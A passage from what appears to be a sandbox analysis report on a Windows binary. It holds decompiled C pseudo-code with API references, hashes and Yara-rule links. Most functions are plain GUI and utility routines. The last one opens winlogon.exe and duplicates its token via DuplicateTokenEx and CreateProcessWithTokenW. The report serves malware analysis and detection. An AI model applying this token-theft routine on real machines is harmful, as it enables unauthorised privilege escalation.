					L11:
					_t50 = 0;
					goto L12;
				} else {
					asm("cdq");
					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
					if(_t50 >= 0) {
						L12:
						if(_t83 < 0) {
							_t83 = 0;
						}
						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
					}
					goto L11;
				}
			}


















                                                                                                        0x00404da9
                                                                                                        0x00404dbc
                                                                                                        0x00404dbf
                                                                                                        0x00404dc6
                                                                                                        0x00404dcc
                                                                                                        0x00404dce
                                                                                                        0x00404de1
                                                                                                        0x00404deb
                                                                                                        0x00404df2
                                                                                                        0x00404df4
                                                                                                        0x00404df4
                                                                                                        0x00404e07
                                                                                                        0x00404e0d
                                                                                                        0x00404e18
                                                                                                        0x00404e1c
                                                                                                        0x00404e1e
                                                                                                        0x00404e27
                                                                                                        0x00404e28
                                                                                                        0x00404e29
                                                                                                        0x00404e2f
                                                                                                        0x00404e31
                                                                                                        0x00404e37
                                                                                                        0x00404e41
                                                                                                        0x00404e42
                                                                                                        0x00404e43
                                                                                                        0x00404e46
                                                                                                        0x00404e46
                                                                                                        0x00404e1c
                                                                                                        0x00404e4d
                                                                                                        0x00404e50
                                                                                                        0x00404e5f
                                                                                                        0x00404e66
                                                                                                        0x00404e52
                                                                                                        0x00404e52
                                                                                                        0x00404e52
                                                                                                        0x00404e6d
                                                                                                        0x00404e70
                                                                                                        0x00404e85
                                                                                                        0x00404e85
                                                                                                        0x00000000
                                                                                                        0x00404e72
                                                                                                        0x00404e7b
                                                                                                        0x00404e80
                                                                                                        0x00404e83
                                                                                                        0x00404e87
                                                                                                        0x00404e89
                                                                                                        0x00404e8b
                                                                                                        0x00404e8b
                                                                                                        0x00404ea8
                                                                                                        0x00404ea8
                                                                                                        0x00000000
                                                                                                        0x00404e83

                                                                                                        APIs
                                                                                                        • GetSystemMetrics.USER32 ref: 00404DC2
                                                                                                        • GetSystemMetrics.USER32 ref: 00404DC8
                                                                                                        • GetDC.USER32(00000000), ref: 00404DD5
                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
                                                                                                        • ReleaseDC.USER32 ref: 00404DF4
                                                                                                        • GetWindowRect.USER32 ref: 00404E07
                                                                                                        • GetParent.USER32(?), ref: 00404E12
                                                                                                        • GetWindowRect.USER32 ref: 00404E2F
                                                                                                        • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                        • String ID:
                                                                                                        • API String ID: 2163313125-0
                                                                                                        • Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                        • Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
                                                                                                        • Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                        • Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00406398, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 88%
                                                                                                        			E00406398(void* __eflags, wchar_t* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E00404AAA(_a4);
				if(_t3 != 0) {
					wcscpy(0x40fb90, _a4);
					wcscpy(0x40fda0, L"general");
					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
					asm("sbb eax, eax");
					 *0x40fe28 =  ~(_t6 - 1) + 1;
					E00405F14(0x40fe30, L"charset", 0x3f);
					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
				}
				return _t3;
			}






                                                                                                        0x0040639c
                                                                                                        0x004063a4
                                                                                                        0x004063b2
                                                                                                        0x004063c2
                                                                                                        0x004063d3
                                                                                                        0x004063dc
                                                                                                        0x004063eb
                                                                                                        0x004063f0
                                                                                                        0x00406401
                                                                                                        0x00000000
                                                                                                        0x0040641e
                                                                                                        0x0040641f

                                                                                                        APIs
                                                                                                          • Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE
                                                                                                        • wcscpy.MSVCRT ref: 004063B2
                                                                                                        • wcscpy.MSVCRT ref: 004063C2
                                                                                                        • GetPrivateProfileIntW.KERNEL32 ref: 004063D3
                                                                                                          • Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32 ref: 00405F30
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                        • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                        • API String ID: 3176057301-2039793938
                                                                                                        • Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                        • Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
                                                                                                        • Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                        • Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040ADF1, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 16%
                                                                                                        			E0040ADF1(signed short* __eax, void* __ecx) {
				void* _t2;
				signed short* _t3;
				void* _t7;
				void* _t8;
				void* _t10;

				_t3 = __eax;
				_t8 = __ecx;
				_t7 = 8;
				while(1) {
					_t2 =  *_t3 & 0x0000ffff;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t7);
					_push(L"&lt;");
					L14:
					_t2 = memcpy(_t8, ??, ??);
					_t10 = _t10 + 0xc;
					_t8 = _t8 + _t7;
					L16:
					if( *_t3 != 0) {
						_t3 =  &(_t3[1]);
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if((_t2 & 0x0000ffff) != 0xffffffb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t8 = _t2;
										_t8 = _t8 + 2;
									} else {
										_push(_t7);
										_push(L"<br>");
										goto L14;
									}
								} else {
									_push(0xa);
									_push(L"&amp;");
									goto L11;
								}
							} else {
								_push(0xa);
								_push(L"&deg;");
								L11:
								_t2 = memcpy(_t8, ??, ??);
								_t10 = _t10 + 0xc;
								_t8 = _t8 + 0xa;
							}
						} else {
							_t2 = memcpy(_t8, L"&quot;", 0xc);
							_t10 = _t10 + 0xc;
							_t8 = _t8 + 0xc;
						}
					} else {
						_push(_t7);
						_push(L"&gt;");
						goto L14;
					}
					goto L16;
				}
			}








                                                                                                        0x0040adf6
                                                                                                        0x0040adf8
                                                                                                        0x0040adfa
                                                                                                        0x0040adfb
                                                                                                        0x0040adfb
                                                                                                        0x0040ae02
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040ae04
                                                                                                        0x0040ae05
                                                                                                        0x0040ae6d
                                                                                                        0x0040ae6e
                                                                                                        0x0040ae73
                                                                                                        0x0040ae76
                                                                                                        0x0040ae7f
                                                                                                        0x0040ae83
                                                                                                        0x0040ae86
                                                                                                        0x00000000
                                                                                                        0x0040ae86
                                                                                                        0x0040ae8f
                                                                                                        0x0040ae0c
                                                                                                        0x0040ae10
                                                                                                        0x0040ae1e
                                                                                                        0x0040ae3b
                                                                                                        0x0040ae4a
                                                                                                        0x0040ae65
                                                                                                        0x0040ae7a
                                                                                                        0x0040ae7e
                                                                                                        0x0040ae67
                                                                                                        0x0040ae67
                                                                                                        0x0040ae68
                                                                                                        0x00000000
                                                                                                        0x0040ae68
                                                                                                        0x0040ae4c
                                                                                                        0x0040ae4c
                                                                                                        0x0040ae4e
                                                                                                        0x00000000
                                                                                                        0x0040ae4e
                                                                                                        0x0040ae3d
                                                                                                        0x0040ae3d
                                                                                                        0x0040ae3f
                                                                                                        0x0040ae53
                                                                                                        0x0040ae54
                                                                                                        0x0040ae59
                                                                                                        0x0040ae5c
                                                                                                        0x0040ae5c
                                                                                                        0x0040ae20
                                                                                                        0x0040ae28
                                                                                                        0x0040ae2d
                                                                                                        0x0040ae30
                                                                                                        0x0040ae30
                                                                                                        0x0040ae12
                                                                                                        0x0040ae12
                                                                                                        0x0040ae13
                                                                                                        0x00000000
                                                                                                        0x0040ae13
                                                                                                        0x00000000
                                                                                                        0x0040ae10

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                        • API String ID: 3510742995-3273207271
                                                                                                        • Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                        • Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
                                                                                                        • Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                        • Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004041EB, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr* _v12;
				void _v534;
				short _v536;
				void* __ebx;
				void* __edi;
				intOrPtr _t42;
				intOrPtr* _t95;
				RECT* _t96;

				_t95 = __ecx;
				_v12 = __ecx;
				if(_a4 == 0x233) {
					_v536 = 0;
					memset( &_v534, 0, 0x208);
					DragQueryFileW(_a8, 0,  &_v536, 0x104);
					DragFinish(_a8);
					 *((intOrPtr*)( *_t95 + 4))(0);
					E00404923(0x104, _t95 + 0x1680,  &_v536);
					 *((intOrPtr*)( *_v12 + 4))(1);
					_t95 = _v12;
				}
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t42 = _a12;
							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
						}
					} else {
						E00402EC8(_t95 + 0x40);
					}
				} else {
					_v8 = BeginDeferWindowPos(0xd);
					_t96 = _t95 + 0x40;
					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t96 + 0x10), _t96, 1);
					_t95 = _v12;
				}
				return E00402CED(_t95, _a4, _a8, _a12);
			}












                                                                                                        0x004041f9
                                                                                                        0x00404205
                                                                                                        0x00404208
                                                                                                        0x00404217
                                                                                                        0x0040421e
                                                                                                        0x00404236
                                                                                                        0x0040423f
                                                                                                        0x0040424a
                                                                                                        0x0040425f
                                                                                                        0x0040426b
                                                                                                        0x0040426e
                                                                                                        0x0040426e
                                                                                                        0x00404275
                                                                                                        0x004043be
                                                                                                        0x004043ce
                                                                                                        0x004043d0
                                                                                                        0x004043d3
                                                                                                        0x004043da
                                                                                                        0x004043da
                                                                                                        0x004043c0
                                                                                                        0x004043c3
                                                                                                        0x004043c3
                                                                                                        0x0040427b
                                                                                                        0x0040428c
                                                                                                        0x0040428f
                                                                                                        0x00404295
                                                                                                        0x004042a5
                                                                                                        0x004042b8
                                                                                                        0x004042cb
                                                                                                        0x004042de
                                                                                                        0x004042f1
                                                                                                        0x00404304
                                                                                                        0x00404317
                                                                                                        0x0040432a
                                                                                                        0x0040433d
                                                                                                        0x00404350
                                                                                                        0x00404363
                                                                                                        0x00404376
                                                                                                        0x00404389
                                                                                                        0x0040439c
                                                                                                        0x004043a4
                                                                                                        0x004043af
                                                                                                        0x004043b5
                                                                                                        0x004043b5
                                                                                                        0x004043f5

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040421E
                                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
                                                                                                        • DragFinish.SHELL32(?), ref: 0040423F
                                                                                                          • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                          • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                          • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                          • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                          • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                        • BeginDeferWindowPos.USER32 ref: 0040427D
                                                                                                        • EndDeferWindowPos.USER32(?), ref: 004043A4
                                                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 004043AF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
                                                                                                        • String ID: $
                                                                                                        • API String ID: 2142561256-3993045852
                                                                                                        • Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                        • Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
                                                                                                        • Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                        • Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00405B81, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 55%
                                                                                                        			E00405B81(signed short __ebx) {
				signed int _t21;
				void* _t22;
				struct HINSTANCE__* _t25;
				signed int _t27;
				void* _t35;
				signed short _t39;
				signed int _t40;
				void* _t57;
				int _t61;
				void* _t62;
				int _t71;

				_t39 = __ebx;
				if( *0x41c470 == 0) {
					E00405ADF();
				}
				_t40 =  *0x41c468;
				_t21 = 0;
				if(_t40 <= 0) {
					L5:
					_t57 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
						_t21 = _t21 + 1;
						if(_t21 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
				}
				L6:
				if(_t57 != 0) {
					L21:
					_t22 = _t57;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x40fb90 == 0) {
							_push( *0x41c478 - 1);
							_push( *0x41c45c);
							_push(_t39);
							_t25 = E00405CE7();
							goto L15;
						} else {
							wcscpy(0x40fda0, L"strings");
							_t35 = E00405EDD(_t39,  *0x41c45c);
							_t62 = _t62 + 0x10;
							if(_t35 == 0) {
								L13:
								_t25 = GetModuleHandleW(0);
								_push( *0x41c478 - 1);
								_push( *0x41c45c);
								_push(_t39);
								goto L15;
							} else {
								_t61 = wcslen( *0x41c45c);
								if(_t61 == 0) {
									goto L13;
								}
							}
						}
					} else {
						_t25 = GetModuleHandleW(_t57);
						_push( *0x41c478 - 1);
						_push( *0x41c45c);
						_push(_t39 & 0x0000ffff);
						L15:
						_t61 = LoadStringW(_t25, ??, ??, ??);
						_t71 = _t61;
					}
					if(_t71 <= 0) {
						L20:
						_t22 = 0x40c4e8;
					} else {
						_t27 =  *0x41c46c;
						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
							goto L20;
						} else {
							_t57 =  *0x41c458 + _t27 * 2;
							_t14 = _t61 + 2; // 0x2
							memcpy(_t57,  *0x41c45c, _t61 + _t14);
							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
							 *0x41c468 =  *0x41c468 + 1;
							 *0x41c46c =  *0x41c46c + _t61 + 1;
							if(_t57 != 0) {
								goto L21;
							} else {
								goto L20;
							}
						}
					}
				}
				return _t22;
			}














                                                                                                        0x00405b81
                                                                                                        0x00405b88
                                                                                                        0x00405b8a
                                                                                                        0x00405b8a
                                                                                                        0x00405b8f
                                                                                                        0x00405b96
                                                                                                        0x00405b9b
                                                                                                        0x00405bad
                                                                                                        0x00405bad
                                                                                                        0x00405b9d
                                                                                                        0x00405b9d
                                                                                                        0x00405ba8
                                                                                                        0x00405bab
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405bab
                                                                                                        0x00405be9
                                                                                                        0x00405be9
                                                                                                        0x00405baf
                                                                                                        0x00405bb1
                                                                                                        0x00405ce2
                                                                                                        0x00405ce2
                                                                                                        0x00405bb7
                                                                                                        0x00405bbd
                                                                                                        0x00405bf6
                                                                                                        0x00405c4b
                                                                                                        0x00405c4c
                                                                                                        0x00405c52
                                                                                                        0x00405c53
                                                                                                        0x00000000
                                                                                                        0x00405bf8
                                                                                                        0x00405c02
                                                                                                        0x00405c0e
                                                                                                        0x00405c13
                                                                                                        0x00405c18
                                                                                                        0x00405c2c
                                                                                                        0x00405c2e
                                                                                                        0x00405c3b
                                                                                                        0x00405c3c
                                                                                                        0x00405c42
                                                                                                        0x00000000
                                                                                                        0x00405c1a
                                                                                                        0x00405c25
                                                                                                        0x00405c2a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405c2a
                                                                                                        0x00405c18
                                                                                                        0x00405bbf
                                                                                                        0x00405bc0
                                                                                                        0x00405bcd
                                                                                                        0x00405bce
                                                                                                        0x00405bd7
                                                                                                        0x00405c58
                                                                                                        0x00405c5f
                                                                                                        0x00405c61
                                                                                                        0x00405c61
                                                                                                        0x00405c63
                                                                                                        0x00405cdb
                                                                                                        0x00405cdb
                                                                                                        0x00405c65
                                                                                                        0x00405c65
                                                                                                        0x00405c74
                                                                                                        0x00000000
                                                                                                        0x00405c84
                                                                                                        0x00405c8a
                                                                                                        0x00405c8d
                                                                                                        0x00405c99
                                                                                                        0x00405caf
                                                                                                        0x00405cbd
                                                                                                        0x00405cc8
                                                                                                        0x00405cd4
                                                                                                        0x00405cd9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405cd9
                                                                                                        0x00405c74
                                                                                                        0x00405c63
                                                                                                        0x00405ce6

                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                        • wcscpy.MSVCRT ref: 00405C02
                                                                                                          • Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
                                                                                                          • Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE
                                                                                                        • wcslen.MSVCRT ref: 00405C20
                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                        • LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                        • memcpy.MSVCRT ref: 00405C99
                                                                                                          • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
                                                                                                          • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
                                                                                                          • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
                                                                                                          • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                        • String ID: strings
                                                                                                        • API String ID: 3166385802-3030018805
                                                                                                        • Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                        • Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
                                                                                                        • Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                        • Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401E44, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 75%
                                                                                                        			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
				char _v8;
				void* _v12;
				void* __esi;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				int _t37;
				intOrPtr* _t39;
				intOrPtr* _t40;

				_v8 = 0;
				_t18 = OpenProcess(0x2000000, 0, _a8);
				_v12 = _t18;
				if(_t18 == 0) {
					_t37 = GetLastError();
				} else {
					_t39 = _a4 + 0x800;
					_a8 = 0;
					E0040289F(_t39);
					_t22 =  *((intOrPtr*)(_t39 + 4));
					if(_t22 == 0) {
						_t23 = 0;
					} else {
						_t23 =  *_t22(_v12, 2,  &_a8);
					}
					if(_t23 == 0) {
						_t37 = GetLastError();
					} else {
						_a4 = _a8;
						E0040289F(_t39);
						_t40 =  *((intOrPtr*)(_t39 + 8));
						if(_t40 == 0) {
							_t28 = 0;
						} else {
							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
						}
						if(_t28 == 0) {
							_t37 = GetLastError();
						} else {
							 *_a12 = _v8;
							_t37 = 0;
						}
						CloseHandle(_a8);
					}
					CloseHandle(_v12);
				}
				return _t37;
			}













                                                                                                        0x00401e59
                                                                                                        0x00401e5c
                                                                                                        0x00401e64
                                                                                                        0x00401e67
                                                                                                        0x00401ef9
                                                                                                        0x00401e6d
                                                                                                        0x00401e70
                                                                                                        0x00401e76
                                                                                                        0x00401e79
                                                                                                        0x00401e7e
                                                                                                        0x00401e83
                                                                                                        0x00401e92
                                                                                                        0x00401e85
                                                                                                        0x00401e8e
                                                                                                        0x00401e8e
                                                                                                        0x00401e96
                                                                                                        0x00401ee6
                                                                                                        0x00401e98
                                                                                                        0x00401e9b
                                                                                                        0x00401e9e
                                                                                                        0x00401ea3
                                                                                                        0x00401ea8
                                                                                                        0x00401ebb
                                                                                                        0x00401eaa
                                                                                                        0x00401eb7
                                                                                                        0x00401eb7
                                                                                                        0x00401ebf
                                                                                                        0x00401ed3
                                                                                                        0x00401ec1
                                                                                                        0x00401ec7
                                                                                                        0x00401ec9
                                                                                                        0x00401ec9
                                                                                                        0x00401ed8
                                                                                                        0x00401ed8
                                                                                                        0x00401eeb
                                                                                                        0x00401eeb
                                                                                                        0x00401f01

                                                                                                        APIs
                                                                                                        • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3
                                                                                                          • Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                          • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                          • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                          • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                          • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
                                                                                                        • String ID: winlogon.exe
                                                                                                        • API String ID: 1315556178-961692650
                                                                                                        • Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                        • Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
                                                                                                        • Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                        • Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

